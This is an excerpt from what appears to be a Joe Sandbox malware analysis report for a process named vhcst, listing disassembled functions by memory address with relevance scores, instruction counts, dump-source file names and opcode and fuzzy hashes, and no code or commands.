                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d949a9a253a3ffe0f4c321d48463ddc331c7a28d9b78a36a020764649a876cf3
                                                                                      • Instruction ID: ba6d243dd988fae2092a524c1976343d3ebfc160e100f4c108170f791a1ecfc0
                                                                                      • Opcode Fuzzy Hash: d949a9a253a3ffe0f4c321d48463ddc331c7a28d9b78a36a020764649a876cf3
                                                                                      • Instruction Fuzzy Hash: 8C21272061E7C60FC7779B7858654B57FE0EF5221970501FBE489CB2A2DE199846C342
                                                                                      Function 00007FFD99E1D0D8 Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8d7317cdcfb2403ba9a36dee02c30c542c6b4e50e4d99deb7eb490d1a832c43a
                                                                                      • Instruction ID: 8eb183991545120e07adafd459aadc87699913fc30301f8d962b856305a6e395
                                                                                      • Opcode Fuzzy Hash: 8d7317cdcfb2403ba9a36dee02c30c542c6b4e50e4d99deb7eb490d1a832c43a
                                                                                      • Instruction Fuzzy Hash: 2221C736F0985E4AF770AEA458A16FA76D5EF85358F400936D41DC30C3DE2A791A46C3
                                                                                      Function 00007FFD99E2AB85 Relevance: .1, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db09486b0fd643937d938189d4cfd268a20471f6c65030e9af64f714b2556f83
                                                                                      • Instruction ID: 05c1d45fdf8876bff55f61ef5bebdcc949bb64b9a1e810ec7b4556ff7b08c518
                                                                                      • Opcode Fuzzy Hash: db09486b0fd643937d938189d4cfd268a20471f6c65030e9af64f714b2556f83
                                                                                      • Instruction Fuzzy Hash: D321D366F0A85E4BF7B4AEA888B72FD77D5EF84318F040176D45CC74C2ED1A291A4583
                                                                                      Function 00007FFD99E222C6 Relevance: .1, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8265dba7e0c42e44b68fca4caf82ec53d453b9f4901a0463b832797294987294
                                                                                      • Instruction ID: 18b8f9be62de3f35c033c7655aedd4d496d528116b1648c26cab64d6adacf348
                                                                                      • Opcode Fuzzy Hash: 8265dba7e0c42e44b68fca4caf82ec53d453b9f4901a0463b832797294987294
                                                                                      • Instruction Fuzzy Hash: C331F130715A4E8FDB88DF18C8A4AB973E2FF983157504569D81ECB391CB32E852CB41
                                                                                      Function 00007FFD99E23E2A Relevance: .1, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bf9a62fdbe33e764174ddcbc0eb8b6936eec92bce6b21b4eda3140024ff33135
                                                                                      • Instruction ID: 15937af49da120c9f83d8954391d6a46f30819e74570f16680088a49de1df892
                                                                                      • Opcode Fuzzy Hash: bf9a62fdbe33e764174ddcbc0eb8b6936eec92bce6b21b4eda3140024ff33135
                                                                                      • Instruction Fuzzy Hash: DB21D626E0E69A0AF7729AA46CA11FC76E0FF45728F0411B5D45CC64C3DD1A290E4E93
                                                                                      Function 00007FFD99E12F1F Relevance: .1, Instructions: 88COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8828ea64f7fed6a5c3d20888821306dbf80cb2fc006c6afbe6104edcb5450420
                                                                                      • Instruction ID: 4f9ea2135e4e3f636906b148299eddd9ea5233253b741ee6983a5a9ac4678670
                                                                                      • Opcode Fuzzy Hash: 8828ea64f7fed6a5c3d20888821306dbf80cb2fc006c6afbe6104edcb5450420
                                                                                      • Instruction Fuzzy Hash: F511E963F0DA860FE776562C68622B96BC1DB8A1A8B4441FBD049D76D7ED1A58034382
                                                                                      Function 00007FFD99E1092D Relevance: .1, Instructions: 84COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9393177de1ec5c0871aff78757a724508f255c73c46ce37e6971931556ba99d4
                                                                                      • Instruction ID: 5787a206faa4ae57115e3aa2fd03e42618c5fca7a4c8848cba3f382e9f7bae11
                                                                                      • Opcode Fuzzy Hash: 9393177de1ec5c0871aff78757a724508f255c73c46ce37e6971931556ba99d4
                                                                                      • Instruction Fuzzy Hash: 6C210432E0E99E4FF7B0AAA448B16BA7AD1EF85319F0401B6D45DC30C3DD2A2D194283
                                                                                      Function 00007FFD99E1F2FA Relevance: .1, Instructions: 82COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7c44a60d63f080f736cebc44e3b2ef5ca9803eedb9e4215d90c76881b9b19585
                                                                                      • Instruction ID: d127b8440b0202d8f1047be13457e8d18c6eafecaa33e9544bc6e776ac803b20
                                                                                      • Opcode Fuzzy Hash: 7c44a60d63f080f736cebc44e3b2ef5ca9803eedb9e4215d90c76881b9b19585
                                                                                      • Instruction Fuzzy Hash: 4321F236F0E99A4AF7B5AAB448B12F976D0EF85318F4409B6D41DC30D3DD1A790A42C3
                                                                                      Function 00007FFD99E2182A Relevance: .1, Instructions: 82COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9342939d076a7c9ebe05b43ed571375f584c36e04ae94b45188df42fbb81989a
                                                                                      • Instruction ID: ff1dd77117a385ebbef2726e819f74f1bd420505923087c07fc5ea32c5cff19f
                                                                                      • Opcode Fuzzy Hash: 9342939d076a7c9ebe05b43ed571375f584c36e04ae94b45188df42fbb81989a
                                                                                      • Instruction Fuzzy Hash: C221FC70715A4A8FDB98DF28C8A4A6933E2FF983057504569D81ECB296CB31EC92CB41
                                                                                      Function 00007FFD99E27982 Relevance: .1, Instructions: 81COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 30a10f754b21e0aed0e014087d972ca40cdbf18cd4dc25120692e31c0264dcec
                                                                                      • Instruction ID: 9c155454d768241a3979d9a4847cc9258e3a12e28a16558e468484d71c384456
                                                                                      • Opcode Fuzzy Hash: 30a10f754b21e0aed0e014087d972ca40cdbf18cd4dc25120692e31c0264dcec
                                                                                      • Instruction Fuzzy Hash: F421D761E0E5994AF7709FB448A11BD77D4EF45328F0801BAD45CC34C3ED1B7A094687
                                                                                      Function 00007FFD99E21DB2 Relevance: .1, Instructions: 81COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 81058160729eee9c507cbe5e0d1936800b0dfa38b6502c6b393d032025a40053
                                                                                      • Instruction ID: 703cf3ab9035b019a0ea5134e15fbc1b8e40cf71468c4b12740ef73ccafa6702
                                                                                      • Opcode Fuzzy Hash: 81058160729eee9c507cbe5e0d1936800b0dfa38b6502c6b393d032025a40053
                                                                                      • Instruction Fuzzy Hash: D221C222E0E59E4AFB70AAA44CB12FC77D1EF49358F4801B6D45DCB092DD1A6A494783
                                                                                      Function 00007FFD99E28352 Relevance: .1, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1e7f98c23e6d171fef828971a1328ebf3568397846af4cb2cab05efafcb6c4a3
                                                                                      • Instruction ID: 8857ede34964a383367ae659028b2f80b119ee0a6417d602fc6e4f12a26e9639
                                                                                      • Opcode Fuzzy Hash: 1e7f98c23e6d171fef828971a1328ebf3568397846af4cb2cab05efafcb6c4a3
                                                                                      • Instruction Fuzzy Hash: FC212632E0E99D4BF7B4AAA848A12FD76D1EF45318F5801B6D45CC34C3DE1A2C1A4283
                                                                                      Function 00007FFD99E23482 Relevance: .1, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f057d7d19dcff96418359820c20b9328157d92980a29bddac5606bcb3b5f9651
                                                                                      • Instruction ID: e71f5af7f16d7d50ca58b2755fb9c94d94e9fe53cca6e5105426c174d20d79fb
                                                                                      • Opcode Fuzzy Hash: f057d7d19dcff96418359820c20b9328157d92980a29bddac5606bcb3b5f9651
                                                                                      • Instruction Fuzzy Hash: F921F932F4D5894AF7729AA858A11BD76D0EF45738F0811B6D45CC30C3DD1AA9094E93
                                                                                      Function 00007FFD99E2AFE0 Relevance: .1, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1431d773a012ebbdec53c040b694debeba00a7a8adcb2cd4326a886bd095c1b5
                                                                                      • Instruction ID: 00d0b4a0ca8a398a63e003459b367df42aec779ee64766e3c42749feb20be8dc
                                                                                      • Opcode Fuzzy Hash: 1431d773a012ebbdec53c040b694debeba00a7a8adcb2cd4326a886bd095c1b5
                                                                                      • Instruction Fuzzy Hash: 3421F821E0DACE4FEBA2AF7848656E57BE0EF55204F0409F9D458871E7DD1968498343
                                                                                      Function 00007FFD99E29E95 Relevance: .1, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c2ad69dfec3b8d3d143ee98847c4f9fefd4b55b738d5a9bfacff328c498a13c5
                                                                                      • Instruction ID: 32a5b0e5db236fe35c2979e9f252720e626b7748a83f928ca20f10e0d501d6a8
                                                                                      • Opcode Fuzzy Hash: c2ad69dfec3b8d3d143ee98847c4f9fefd4b55b738d5a9bfacff328c498a13c5
                                                                                      • Instruction Fuzzy Hash: 0F117A22F1EA490FE3786A6C59A16B937D1EB54369F1421BFE0CEC30C7DC0A68068256
                                                                                      Function 00007FFD99E292E2 Relevance: .1, Instructions: 79COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a8a146e2f9631267807943d7622437098edb75914a412328971bd12a606c76fc
                                                                                      • Instruction ID: b5870f20823e84c06f8d4868cd2422111c6c8613e0434d15b4b936442021c00f
                                                                                      • Opcode Fuzzy Hash: a8a146e2f9631267807943d7622437098edb75914a412328971bd12a606c76fc
                                                                                      • Instruction Fuzzy Hash: 7421C922E0E99D0AF7709AA459B12FC76D1FF8531AF1811B6D45CC30D3DD1A68198683
                                                                                      Function 00007FFD99E1679A Relevance: .1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 899645f882981ee855c3a10c7b2347595c147322386ba788dcaf923bfea9b49b
                                                                                      • Instruction ID: a06663f7f65eee4fae498d9250fcfac4d52cff9e79181eb671ddfc0ddeba00fc
                                                                                      • Opcode Fuzzy Hash: 899645f882981ee855c3a10c7b2347595c147322386ba788dcaf923bfea9b49b
                                                                                      • Instruction Fuzzy Hash: 4D210B22F0E99E1AFB74AEA848B12F976D0EF4572CF440177D46CC74D3DD1A69094683
                                                                                      Function 00007FFD99E13F05 Relevance: .1, Instructions: 77COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d60a5031183c681f9d1c4848a4e1141889fd9993803890f54970de33744071e5
                                                                                      • Instruction ID: a774786002b027bf94bdee0daaf56c754fc9ab092ea7f0a4ec3f2b3654ba6128
                                                                                      • Opcode Fuzzy Hash: d60a5031183c681f9d1c4848a4e1141889fd9993803890f54970de33744071e5
                                                                                      • Instruction Fuzzy Hash: 2921D426F0E95A0AF7B2AAA40C756F976F0FF9C318F451176D41CC21C6DD1A681D0693
                                                                                      Function 00007FFD99E19F85 Relevance: .1, Instructions: 76COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: af99c0b84dbe63ed0aeb309c1f3247f551dd80b517733814dbb61406df868a57
                                                                                      • Instruction ID: bf83bbd4bea63df4b61f33502aa733c835231e612bfc4e0ed60b384e684f4101
                                                                                      • Opcode Fuzzy Hash: af99c0b84dbe63ed0aeb309c1f3247f551dd80b517733814dbb61406df868a57
                                                                                      • Instruction Fuzzy Hash: 56212F70B0994A8FDBD4EF18C4A4AA573E2FF59304B1445A5E41DC72AACE35EC41CB41
                                                                                      Function 00007FFD99E226F9 Relevance: .1, Instructions: 76COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 07656fc823f0c3131347fbc8417ba9f27ef096bea119f5cafa51c281a0b1efdc
                                                                                      • Instruction ID: 4bb2e16195569797059988624daaf9bd5e7fbf979d8384226a448bf7b0d5fbf7
                                                                                      • Opcode Fuzzy Hash: 07656fc823f0c3131347fbc8417ba9f27ef096bea119f5cafa51c281a0b1efdc
                                                                                      • Instruction Fuzzy Hash: 6D21F622E0E59E4AF7789AA448B12FD36D1EF95318F440176D41CC36C3ED1E69090283
                                                                                      Function 00007FFD99E418E0 Relevance: .1, Instructions: 74COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 35da5045f2b249e307a470cbb5163340242e401eb7a313da13e75c3928afd065
                                                                                      • Instruction ID: 738ee5ba6bb37e2c986c04e7cb4f31301d0557f749b637b31e86ab91bc49259e
                                                                                      • Opcode Fuzzy Hash: 35da5045f2b249e307a470cbb5163340242e401eb7a313da13e75c3928afd065
                                                                                      • Instruction Fuzzy Hash: 6F012F32B1DD190BAB58B518A84A9F5B3D0DBA5275704057FD80DC31E6DD26A8428386
                                                                                      Function 00007FFD99E250AE Relevance: .1, Instructions: 73COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 94c83c2af4d5b541cd56f2865d2ea668c65cf61797119e62aa352f03cefe4558
                                                                                      • Instruction ID: 3257e48d2449179cfbdc699f7d4f456af9c20f88e74988707ed681ce04238f51
                                                                                      • Opcode Fuzzy Hash: 94c83c2af4d5b541cd56f2865d2ea668c65cf61797119e62aa352f03cefe4558
                                                                                      • Instruction Fuzzy Hash: AD116021B0898E4FDBD9FF288461ABA77D2FFA8304B1445A4D41DC729ADE35E8428781
                                                                                      Function 00007FFD99E25589 Relevance: .1, Instructions: 73COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9205cfd043204e54646a1fb0bbc792703560eecaa4ec7954cd934056b1a8c0cf
                                                                                      • Instruction ID: fd4f665f89504844ceed10dad474dd5a0a4894ee70ff21180c5c114783728f9d
                                                                                      • Opcode Fuzzy Hash: 9205cfd043204e54646a1fb0bbc792703560eecaa4ec7954cd934056b1a8c0cf
                                                                                      • Instruction Fuzzy Hash: DE210232E0E99A4EF7B0AAA459B52FC76D1EF89318F0801B6D41DC34C3ED1E6D090683
                                                                                      Function 00007FFD99E1F4F8 Relevance: .1, Instructions: 73COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0208211d47eda10a705c97daaab25b75b8c74d7b2116386823edfd967a4a8f3c
                                                                                      • Instruction ID: 8c6fcecb464c5c41ed4c6e1b743c5dc36595364b33f1f7989f3ac15af0b3c692
                                                                                      • Opcode Fuzzy Hash: 0208211d47eda10a705c97daaab25b75b8c74d7b2116386823edfd967a4a8f3c
                                                                                      • Instruction Fuzzy Hash: 23114C21F1DE0A0BF378696C59A57BE62C5EB48369F20213EE4CFC31CBDC0A78028156
                                                                                      Function 00007FFD99E1D95B Relevance: .1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f446ebee712ab8ac4098d80a9b02fc8d2781111d7abe032cf07058bf0f246187
                                                                                      • Instruction ID: 4230fa698651edc50a32a94ca83b4ad21344f6591e61d2a4a2458936b71a4621
                                                                                      • Opcode Fuzzy Hash: f446ebee712ab8ac4098d80a9b02fc8d2781111d7abe032cf07058bf0f246187
                                                                                      • Instruction Fuzzy Hash: AE11E622F1E85E4BFBB0EEA848B12F976D5EF84318F440176D41DC34C6DD5A695A0583
                                                                                      Function 00007FFD99E1E52C Relevance: .1, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7f0f3c5a19fb16cde3bfe5c971813d2a7f27492dc68aedec7686116df6f2646d
                                                                                      • Instruction ID: d12c0b3dceb6c6681cb030b049400144e255dc4a07310f33ed68971db99f431b
                                                                                      • Opcode Fuzzy Hash: 7f0f3c5a19fb16cde3bfe5c971813d2a7f27492dc68aedec7686116df6f2646d
                                                                                      • Instruction Fuzzy Hash: D111D636F0A85E4AF7B4ADA418B22F972D1EFA4318F44013DF41DC34C2EE1AA9190783
                                                                                      Function 00007FFD99E1CF78 Relevance: .1, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 85276199f9d622f6aa40f45ce7d1856053b1acd2849caaa833b8e5d393a2a65c
                                                                                      • Instruction ID: 0d7c3d59ff983bbf12b07918bb8b343b6c512a5415c26131d7190331c48b99b3
                                                                                      • Opcode Fuzzy Hash: 85276199f9d622f6aa40f45ce7d1856053b1acd2849caaa833b8e5d393a2a65c
                                                                                      • Instruction Fuzzy Hash: 2111E935F0985E46F7B4A9A448756F971D5EFA4318F44013DF41DC34C2FE1AA9090783
                                                                                      Function 00007FFD99E211A0 Relevance: .1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ea6a4a5206562de25da4ba9dc69eab3679c1bbeaa3be569763e7c9a64ca87d03
                                                                                      • Instruction ID: 4538dbebb631622de83c7045d95fa622b42b3cd3e651ef86c3a4d1c615b5865b
                                                                                      • Opcode Fuzzy Hash: ea6a4a5206562de25da4ba9dc69eab3679c1bbeaa3be569763e7c9a64ca87d03
                                                                                      • Instruction Fuzzy Hash: 4B11C835F0D85E46FB78AAA458616FD72D1FF88318F540135E41DD36C2DD1E29190583
                                                                                      Function 00007FFD99E2AAC0 Relevance: .1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 11556baedcd40ffc2e22ab8c0f2c8c04cbdf8fc74c71bce91129c0b187f8876c
                                                                                      • Instruction ID: 92c791bf1e82f9a861b960d17922e7cba5fce22f0ca554dd96c9a94617702955
                                                                                      • Opcode Fuzzy Hash: 11556baedcd40ffc2e22ab8c0f2c8c04cbdf8fc74c71bce91129c0b187f8876c
                                                                                      • Instruction Fuzzy Hash: F901C832709C0A5FEBA8DA9CE4D8B7173D1FBD8314B544276D40CC3295DD269C818341
                                                                                      Function 00007FFD99E13E00 Relevance: .1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f84eb4ba499b245e2a11641a26789a4b415991cd9bd272c3753b86747ead5fc8
